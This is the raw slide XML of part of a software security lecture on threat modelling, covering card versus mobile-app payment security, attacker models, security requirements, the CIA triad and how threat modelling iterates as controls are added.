        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="1268760"/>
            <a:ext cx="2504128" cy="19193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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF8166C5-C505-F662-19E8-457754764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NL" sz="2400" dirty="0"/>
              <a:t>Some differences that affect security</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" altLang="en-NL" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B911528-EF55-8611-7525-771085CBAF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52513"/>
            <a:ext cx="7770813" cy="5041900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr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Extracting key material harder for cards than for the app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Contactless options have wireless attack surface that contact card lacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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but how big a threat is it that really?    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Mobile app contains way more software, so most likely to contain software vulnerabilities, but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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can be updated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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can use biometric authentication instead of PIN code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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allows user to check transactions &amp; detect fraud  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Contact payment always requires PIN, contactless payment often does not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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PIN makes authentication stronger, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>but introduces risk of leaking PIN, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>which increases risks to customer, given bank’s liability rules  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="1600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en-US" altLang="en-NL" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-NL" altLang="en-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F82558-40F5-87C9-E420-B3AB1530640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8F792336-70CB-49C0-810C-037D0C24C16C}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-N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98FE8-4504-958E-B691-EBD111113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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0734A9AE-AF78-C7E1-6F1A-DD7FDD66E3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2565400"/>
            <a:ext cx="7770813" cy="863600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="2000" dirty="0"/>
              <a:t>Software Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
              <a:t>Threat Modelling</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" altLang="en-NL" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2106928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AB6A45-F353-CE6F-EF31-E830B5598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Threat modelling</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="24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9FBAD2-B428-C7F3-14B2-1DB9AC80B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Doing a risk analysis of an application:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacks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  to then come up with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security requirements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> security controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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I.e. answering questions like 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What do we care about as defenders?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What are things that an attacker is interested in?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What are ways that an attacker can attack?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        -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack vectors </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="11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1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Threat modelling is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iterative process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: we can repeat it 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for more detailed descriptions of the system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as we add security controls to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="10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i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1800" i="1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267F37-69F1-C564-328A-0D31E1E9650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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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7FF0FDCD-F29B-118F-5972-CA762ABF5F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6590343" y="2636912"/>
            <a:ext cx="131327" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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NL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66C762-DF84-4853-9DD4-3E9ACAAC6094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6804248" y="2786931"/>
            <a:ext cx="1527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+mj-lt"/>
              </a:rPr>
              <a:t>the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>model</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="18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408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el 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D29A8158-9D06-51C4-0F80-436DDFC9A3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4000" y="260350"/>
            <a:ext cx="8782050" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Importance of  threat modelling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FADE763-711D-FE11-68B0-B4DB5F881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63625"/>
            <a:ext cx="7918450" cy="503078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altLang="en-US" dirty="0"/>
              <a:t>Discussing security is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" u="sng" dirty="0"/>
              <a:t>meaningless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t> without answering </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="18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GB" dirty="0"/>
              <a:t>What are your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> secure?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" i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en-GB" sz="40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GB" dirty="0"/>
              <a:t>What is your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> system have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> secure?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Good</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to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debunk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silly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> security claims: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ask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people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for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their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If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people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cannot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answer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this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>talking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bullshit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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altLang="nl-NL" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="Tijdelijke aanduiding voor dianummer 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B531AC-217E-F190-BDA1-E0DA743AD80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231BD0E9-58B8-4016-8DE2-3E40DF6F2997}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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227A1-69B0-D697-4104-24CC9BBD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Iterative nature of threat modelling</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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869AFB-283A-C17B-DDB8-037E0C7F5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63625"/>
            <a:ext cx="7770813" cy="5317703"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Integrity &amp; confidentiality of communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>-&gt; encryption &amp; digital signatures </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -&gt; extra functionality for key distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  -&gt; new security requirements:     confidentiality of private keys  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>                                                                 integrity of public keys </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Risk of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> software vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>         -&gt; need for update mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>          -&gt; authentication/integrity protection of updates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1600" dirty="0"/>
              <a:t>Presence of any security-sensitive functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>  -&gt;  need for access control incl. authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    -&gt;  use of passwords for authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>     -&gt; we need a database to store passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>        -&gt; SQL injection as new security risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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281E67-D86C-4790-07C4-B7CCFE7787B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11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25600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1D8DE-20D6-C177-B453-90C49EDE8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548680"/>
            <a:ext cx="4007251" cy="5473726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Security requirements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CIA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confidentiality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integrity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availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>      of data, code or functionality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But also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non-repudiation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400" dirty="0"/>
              <a:t>(in Dutch: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>onweerlegbaarheid</a:t>
            </a:r>
            <a:r>
